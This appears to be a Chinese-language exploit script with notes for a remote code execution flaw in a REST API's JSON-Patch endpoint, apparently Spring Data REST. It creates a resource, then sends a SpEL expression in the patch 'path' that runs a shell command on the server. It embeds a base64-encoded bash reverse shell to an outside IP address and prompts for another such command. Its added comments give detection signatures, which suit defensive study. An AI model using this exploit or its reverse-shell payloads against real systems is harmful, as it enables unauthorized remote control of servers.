漏洞原理分析

https://zhuanlan.zhihu.com/p/166373950

打法

# Scratch snippet used while writing the JSON-Patch request described in the
# string below: it converts a command into the comma-separated decimal byte
# list that the `new byte[]{...}` literal inside the SpEL `path` expects.
'''
首先访问/api/people POST提交JSON数据{"firstName":"w3","lastName":"lkin"}来创建一个用户
接着访问返回地址改为PATCH请求   content-type改为application/json-patch+json
exp
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{生成的数字}))/lastname", "value": "whatever" }]
'''
# Hard-coded sample command: `bash -c {echo,<base64>}|{base64,-d}|{bash,-i}`.
# The base64 blob is specific to the author's setup; the interactive script
# further down builds this same wrapper from user input instead.
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjE3Ni4zOS80NDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'
# One decimal per byte, e.g. b"ab" -> "97,98". From a detection standpoint this
# is the signature to look for: a JSON-Patch `path` that is a SpEL expression
# (`T(java.lang.Runtime)`, `getRuntime`, `new byte[]{...}`) rather than a JSON
# pointer is never a legitimate request for this API.
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

exp

import urllib.parse
import requests
import re
import base64

# Prints a banner, then drives the two-request sequence described above:
# (1) POST /api/people to create a resource, (2) PATCH the returned resource
# URL with a JSON-Patch body whose `path` is a SpEL expression.
print('''
             ████   ██ ██     ██         
            █░░░ █ ░██░██    ░░          
 ███     ██░    ░█ ░██░██  ██ ██ ███████ 
░░██  █ ░██   ███  ░██░██ ██ ░██░░██░░░██
 ░██ ███░██  ░░░ █ ░██░████  ░██ ░██  ░██
 ░████░████ █   ░█ ░██░██░██ ░██ ░██  ░██
 ███░ ░░░██░ ████  ███░██░░██░██ ███  ░██
░░░    ░░░  ░░░░  ░░░ ░░  ░░ ░░ ░░░   ░░      2023.4.11

''')
# Base URL is read interactively; only its scheme and hostname are reused.
url = input("请输入URL:")

parsed_url = urllib.parse.urlparse(url)
protocol = parsed_url.scheme
host = parsed_url.hostname
# `path` and `query_params` are parsed but never used below.
path = parsed_url.path
query_params = urllib.parse.parse_qs(parsed_url.query)
# Rebuilds "scheme://hostname" only — parsed_url.port is not carried over, so
# an explicit port in the input URL is dropped.
host=f"{protocol}://{host}"
# Step 1: create a resource so there is a self-link to PATCH. The body is sent
# as a raw string; no Content-Type header is set here.
exp1=host+"/api/people"
data1='{"firstName":"w3","lastName":"lkin"}'
resp1=requests.post(url=exp1,data=data1)
# The regex expects a `"href" : "..."` entry (note the spaces around the colon)
# in the JSON response; the first such link is taken as the resource URL.
match1 = re.search(r'"href" : "(?P<mes>.*?)"', resp1.text)

if match1:
    host1=match1.group("mes")
    # Step 2 is a JSON-Patch request; the media type is what routes the body
    # to the server's patch handler (presumably Spring Data REST — confirm
    # against the linked write-up).
    headers={
        "content-type":"application/json-patch+json"
    }
    exps=input("请输入要执行的命令 如(bash -i >& /dev/tcp/1.1.1.1/44444 0>&1):")
    # The command is base64-encoded and wrapped as
    # `bash -c {echo,<b64>}|{base64,-d}|{bash,-i}`, then expressed as a
    # decimal byte array for the `new byte[]{...}` literal in the SpEL path.
    encoded_string = base64.b64encode(exps.encode("utf-8"))
    payload = b'bash -c {echo,%s}|{base64,-d}|{bash,-i}'%(encoded_string)
    bytecode = ','.join(str(i) for i in list(payload))
    # The `path` member is a SpEL expression, not a JSON pointer. Server-side
    # mitigation is a build that no longer evaluates patch paths as SpEL; a
    # request-level signature is any JSON-Patch `path` containing `T(` or
    # `getRuntime`.
    exp2='[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{%s}))/lastname", "value": "whatever" }]'%(bytecode)
    resp=requests.patch(url=host1,headers=headers,data=exp2)
    # The raw HTTP response is printed; whether it reflects the command's
    # effect is not established by this script.
    print(resp.text)
else:
    # No `href` link found in the POST response.
    print("没有匹配到结果!")